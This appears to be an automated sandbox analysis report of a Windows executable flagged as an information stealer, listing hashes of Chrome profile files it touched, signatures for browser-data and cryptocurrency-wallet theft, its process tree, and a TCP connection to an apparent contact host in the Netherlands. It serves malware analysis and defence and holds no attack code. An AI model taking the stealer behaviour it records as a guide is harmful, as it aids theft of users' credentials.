SHA512 674f05bd59d1c2b665d27eb609dacf18877537816a54b7c2f6fe31cbbf216590ca7fbf45e330f705ace5be3d5d58023b90e042b386f4bfea4c3350b2f1ff1749

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Default\Local Storage\leveldb\LOG.old

MD5 04426290c7712a5cbf253ab93ddaf201
SHA1 1d3ff9ef22c8481a14a89cee64c33fe2a3e49253
SHA256 59504130a3354ab475799627fed99337361bedf88ae2cb28f5e07bf5c698a649
SHA512 008fecf9035fa6355cd57330773179d477f7ce89a22f3df4b2966d0298a73370b8a3248b486d53e99d2c32b929b0a17388907362168f30a3a5dbe84ce1cacbb9

\??\pipe\crashpad_1724_NHRMAEQILULASOTW

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Default\Local Storage\leveldb\MANIFEST-000004

MD5 031d6d1e28fe41a9bdcbd8a21da92df1
SHA1 38cee81cb035a60a23d6e045e5d72116f2a58683
SHA256 b51bc53f3c43a5b800a723623c4e56a836367d6e2787c57d71184df5d24151da
SHA512 e994cd3a8ee3e3cf6304c33df5b7d6cc8207e0c08d568925afa9d46d42f6f1a5bdd7261f0fd1fcdf4df1a173ef4e159ee1de8125e54efee488a1220ce85af904

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Default\Local Storage\leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Windows\system32\drivers\etc\hosts

MD5 2b19df2da3af86adf584efbddd0d31c0
SHA1 f1738910789e169213611c033d83bc9577373686
SHA256 58868a299c5cf1167ed3fbc570a449ecd696406410b24913ddbd0f06a32595bd
SHA512 4a1831f42a486a0ad2deef3d348e7220209214699504e29fdfeb2a6f7f25ad1d353158cd05778f76ef755e77ccd94ce9b4a7504039e439e4e90fa7cde589daa6

C:\Program Files\Google\Chrome\updater.exe

MD5 84741bc02d2e9226a943aa03b6a4568d
SHA1 617d01316011faf77fba30d49ae1e86ff988380a
SHA256 fa1f99fdd5beab9a996ff3cb58886dc1811fd6e1ba444aee2d80d0d9b9d5ec93
SHA512 1c95842c88f7d17a07fa2480281cbdff27136525c80a00387536a0843e040adcac37fd13166ab7f48398d28fd297c92d5c0d0ef4066e68297ea9f30179754379

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Default\Network\Cookies

MD5 c9ff7748d8fcef4cf84a5501e996a641
SHA1 02867e5010f62f97ebb0cfb32cb3ede9449fe0c9
SHA256 4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988
SHA512 d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Default\Session Storage\CURRENT~RFf7858da.TMP

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\DevToolsActivePort

MD5 f8e33bdc39c6810f36e82932efff4ef6
SHA1 e2c309b78e7b75635c49faadd58a2ff2b8b5d2b1
SHA256 9b8c8b037447eb8db84a8c5a20d65e42048656c81d3b35a5ea3839f3a7df77cc
SHA512 199ac1320678f91dd1c14535c46cadaadc75a3d1b0dbc860ad90320d9434b1670ee24431d1fc2eddc25a4f333a6357a02aec4a6a4f9a361d14bc858de855a1be

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Default\Session Storage\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Default\Local Storage\leveldb\CURRENT

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Default\Code Cache\wasm\index-dir\the-real-index

MD5 abe07b00cd501c8f6ad17b54c442f6b1
SHA1 a6ba802d35a239939bb2e98f5941b7f6cda6755b
SHA256 263c14a93da320c5ab6c469b0da71fcf99f8e496dde7988f0ec15931711c9177
SHA512 a329fae6f5a56a4b53f419bd531ab9ffc95cb60a1f6e7181c8b17c381cdbdb5fe893fdc6772559ea47b6af40a9d04d3b7ee11779f1f70dfc240dab6f6d5ba264

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Default\Code Cache\wasm\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Default\Code Cache\js\index-dir\the-real-index

MD5 b42082fc8475069b066cd4be2b1a1eb9
SHA1 710543039e59200fb5c106f8a69b24025e4c8d36
SHA256 c2cc25c0b61ff004ef7ec5cf5419642f360abc9ac5a00e93ba115ab69c392a52
SHA512 e0726e4dc3d83b03baa8f2a11c0d69e3dc24031d13caeb7aae01328d4b74ac11f29b4b42c5b454a1df4554e9c262ca81106e6aaf0041e5231b252cccb23b6a81

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Default\Code Cache\js\index

MD5 54cb446f628b2ea4a5bce5769910512e
SHA1 c27ca848427fe87f5cf4d0e0e3cd57151b0d820d
SHA256 fbcfe23a2ecb82b7100c50811691dde0a33aa3da8d176be9882a9db485dc0f2d
SHA512 8f6ed2e91aed9bd415789b1dbe591e7eab29f3f1b48fdfa5e864d7bf4ae554acc5d82b4097a770dabc228523253623e4296c5023cf48252e1b94382c43123cb0

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Default\Code Cache\js\60ae0d0fe9088cac_0

MD5 4e06038c915cd74e6352bd1a3458d25d
SHA1 5d74b69cd00ce4b95c9b167cce49a2917306a832
SHA256 365c3d3a8c01c5cf58a91479de548af028228eb7a9f8fe27cfacf9d8b6ada57f
SHA512 784173a3620e2b11bc325368527909590a19e3a09caaa39de6f9814c7d333309356419ae11ab074b77137382db8a91458cd8c4ced70feef99218432ba9c37283

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Default\Cache\Cache_Data\f_000002

MD5 21808cd0724524589cd4ec1ce26f6d58
SHA1 fc5cc4cb347ed20389626c58a6de396ef1ac5ada
SHA256 1a7608a326717e18f424991b924d9c7319eb273cc3af432585d95ce8b068ca8d
SHA512 36902ff35a1ed469aa9cab3856b1b0057ca7db8ea4d92ca1d129e68f02eebd5322a4e81aec29a2b1c0c289e2f82df13684ccf0305378878494260c4d4e6caf0d

C:\Users\Admin\AppData\Local\Google\Chrome\User DataWF9LH\Crashpad\settings.dat

MD5 2c9706166e3737e14c39738b1c1b5306
SHA1 8d36f3009757c4ecbba6dd35d1c3d2b2881e42ad
SHA256 8f89f17722ba50a1509d2b84fc8402d70b4eae756fbb68243e8c66064b4541b0
SHA512 407be3e6e057f90263b495d754c8620418e9bd2a129af0e8fb3013808ff513d1c1a396940bc2f4d6c2b1264783d0de1e73b00ae3914d6ba39d9412dfe649e442

Analysis: behavioral2

Detonation Overview

Submitted

2023-08-10 18:24

Reported

2023-08-10 18:26

Platform

win10v2004-20230703-en

Max time kernel

137s

Max time network

142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe"

Signatures

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe

"C:\Users\Admin\AppData\Local\Temp\113c295681410c02517b52bd6aba932e.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 3460 -ip 3460

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3460 -s 1416

Network

Country Destination Domain Proto
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 240.81.21.72.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 108.211.229.192.in-addr.arpa udp
NL 136.244.98.226:33587 tcp
US 8.8.8.8:53 226.98.244.136.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 254.135.241.8.in-addr.arpa udp
US 8.8.8.8:53 2.77.109.52.in-addr.arpa udp
US 8.8.8.8:53 11.173.189.20.in-addr.arpa udp

Files

memory/3460-134-0x0000000002530000-0x0000000002630000-memory.dmp

memory/3460-135-0x0000000003F10000-0x0000000003F4F000-memory.dmp

memory/3460-136-0x0000000000400000-0x00000000022FF000-memory.dmp

memory/3460-137-0x00000000041F0000-0x0000000004200000-memory.dmp

memory/3460-138-0x00000000751A0000-0x0000000075950000-memory.dmp

memory/3460-139-0x00000000041F0000-0x0000000004200000-memory.dmp

memory/3460-140-0x0000000006A60000-0x0000000007004000-memory.dmp

memory/3460-141-0x0000000007200000-0x0000000007818000-memory.dmp

memory/3460-142-0x0000000007820000-0x000000000792A000-memory.dmp

memory/3460-144-0x00000000041F0000-0x0000000004200000-memory.dmp

memory/3460-143-0x0000000007930000-0x0000000007942000-memory.dmp

memory/3460-145-0x0000000007950000-0x000000000798C000-memory.dmp

memory/3460-146-0x0000000002530000-0x0000000002630000-memory.dmp

memory/3460-147-0x0000000003F10000-0x0000000003F4F000-memory.dmp

memory/3460-148-0x0000000000400000-0x00000000022FF000-memory.dmp

memory/3460-150-0x00000000041F0000-0x0000000004200000-memory.dmp

memory/3460-151-0x00000000751A0000-0x0000000075950000-memory.dmp

memory/3460-152-0x00000000041F0000-0x0000000004200000-memory.dmp

memory/3460-153-0x0000000007C40000-0x0000000007CB6000-memory.dmp

memory/3460-154-0x0000000007CC0000-0x0000000007D52000-memory.dmp

memory/3460-155-0x0000000007D60000-0x0000000007DC6000-memory.dmp

memory/3460-156-0x00000000041F0000-0x0000000004200000-memory.dmp

memory/3460-157-0x00000000041F0000-0x0000000004200000-memory.dmp

memory/3460-158-0x0000000009680000-0x0000000009842000-memory.dmp

memory/3460-159-0x0000000009880000-0x0000000009DAC000-memory.dmp

memory/3460-160-0x00000000088B0000-0x0000000008900000-memory.dmp

memory/3460-162-0x0000000000400000-0x00000000022FF000-memory.dmp

memory/3460-163-0x00000000751A0000-0x0000000075950000-memory.dmp